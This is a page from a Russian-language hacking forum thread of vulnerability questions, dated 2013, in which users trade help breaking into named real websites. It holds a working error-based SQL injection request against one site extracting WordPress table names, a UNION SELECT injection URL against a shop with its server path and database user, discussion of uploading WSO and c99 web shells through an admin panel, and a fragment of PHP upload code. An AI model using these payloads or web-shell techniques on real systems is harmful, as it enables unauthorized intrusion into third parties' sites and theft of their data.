HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 2208 из 2438 « Первая < 12081708210821582198 2204 2205 2206 2207 2208 2209 2210 2211 2212 221822582308 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #22071  
Старый 04.02.2013, 17:40
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию
Цитата:
Сообщение от er9j6@  
er9j6@ said:
Так-то она есть
GET /main.php HTTP/1.1
Host: www.golowar.ru
X-Forwarded-For: 1'and(select(1)from(select(count(*)),concat((selec t(concat_ws(0x3a,table_schema,table_name))from(inf ormation_schema.tables)limit/**/174,1),0x00,floor(rand(0)*2))x/**/from(information_schema.tables)group/**/by(x))a)and'
Duplicate entry 'wp:wp_users' for key 'group_key'
Обрами название бд и таблицы апострофами

`wp`.`wp_users`
 
Ответить с цитированием

  #22072  
Старый 05.02.2013, 16:31
Unknown
Guest
Сообщений: n/a
Провел на форуме:
28262

Репутация: 23
По умолчанию
Del, thx
 
Ответить с цитированием

  #22073  
Старый 07.02.2013, 19:25
BlackIce
Guest
Сообщений: n/a
Провел на форуме:
18665

Репутация: 27
По умолчанию
Имеется возможность править html код страницы. Когда пишу оно просто выводится браузером как обычный тег, будто работаю не с пхп страницей. Что можно сделать?
 
Ответить с цитированием

  #22074  
Старый 07.02.2013, 19:29
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию
Цитата:
Сообщение от BlackIce  
BlackIce said:
Имеется возможность править html код страницы. Когда пишу оно просто выводится браузером как обычный тег, будто работаю не с пхп страницей. Что можно сделать?
ничего
 
Ответить с цитированием

  #22075  
Старый 09.02.2013, 18:32
Vip77
Guest
Сообщений: n/a
Провел на форуме:
46989

Репутация: 20
По умолчанию
Кое как залил wso через file_get_contents а там такое и ничего не открывает из меню... Не Sec. Info не Console... В чем дело?
 
Ответить с цитированием

  #22076  
Старый 09.02.2013, 18:34
er9j6@
Guest
Сообщений: n/a
Провел на форуме:
107835

Репутация: 23
По умолчанию
Цитата:
Сообщение от Vip77  
Vip77 said:
Кое как залил wso через file_get_contents а там такое и ничего не открывает из меню... Не Sec. Info не Console... В чем дело?

Попробуй с99 залить, возможно он будет работать
 
Ответить с цитированием

  #22077  
Старый 09.02.2013, 18:58
Vip77
Guest
Сообщений: n/a
Провел на форуме:
46989

Репутация: 20
По умолчанию
c99 вообще не заливается... дело в том, что я пытаюсь залить через

Через админку, через могу править только content так что вписал туда с начала и залил wso и ничего не получилось, попробовал вписать " />

и терь меню шелла доступно, но файлы не показывает, и в консолье команды не выполняются
 
Ответить с цитированием

  #22078  
Старый 09.02.2013, 19:02
er9j6@
Guest
Сообщений: n/a
Провел на форуме:
107835

Репутация: 23
По умолчанию
Цитата:
Сообщение от Vip77  
Vip77 said:
c99 вообще не заливается... дело в том, что я пытаюсь залить через
Через админку, через могу править только content так что вписал туда с начала и залил wso и ничего не получилось, попробовал вписать " />
и терь меню шелла доступно, но файлы не показывает, и в консолье команды не выполняются
Так можешь вписать вверху index.php?

Click";} else {die("err");}}?>

'); ?>
 
Ответить с цитированием

  #22079  
Старый 10.02.2013, 07:31
foma9999
Новичок
Регистрация: 05.01.2010
Сообщений: 9
Провел на форуме:
13018

Репутация: 0
По умолчанию
Как можно залиться, если доступа к табле юзеров нет?

http://www.elitdress.ru/catalog/product_info.php?products_id=-0+UNION+SELECT+1,2+--+

Известен путь: /var/www/masha/data/www/elitdress.ru/catalog/product_info.php

Известен юзер: masha_elitdress@localhost

Пробовал через char - не вышло.

В админку не попасть, хэши не брутятся.

Пытаюсь залиться через SQL.
 
Ответить с цитированием

  #22080  
Старый 10.02.2013, 08:21
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию
Цитата:
Сообщение от foma9999  
foma9999 said:
Как можно залиться, если доступа к табле юзеров нет?
http://www.elitdress.ru/catalog/product_info.php?products_id=-0+UNION+SELECT+1,2+--+
Известен путь: /var/www/masha/data/www/elitdress.ru/catalog/product_info.php
Известен юзер: masha_elitdress@localhost
Пробовал через char - не вышло.
В админку не попасть, хэши не брутятся.
Пытаюсь залиться через SQL.
сам же ответил на свой вопрос.

если file_priv нету или mq=on,

то через иньекцию залиться не получится.
 
Ответить с цитированием
Ответ
Страница 2208 из 2438 « Первая < 12081708210821582198 2204 2205 2206 2207 2208 2209 2210 2211 2212 221822582308 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 7 (пользователей: 0 , гостей: 7)
 


Быстрый переход




ANTICHAT.XYZ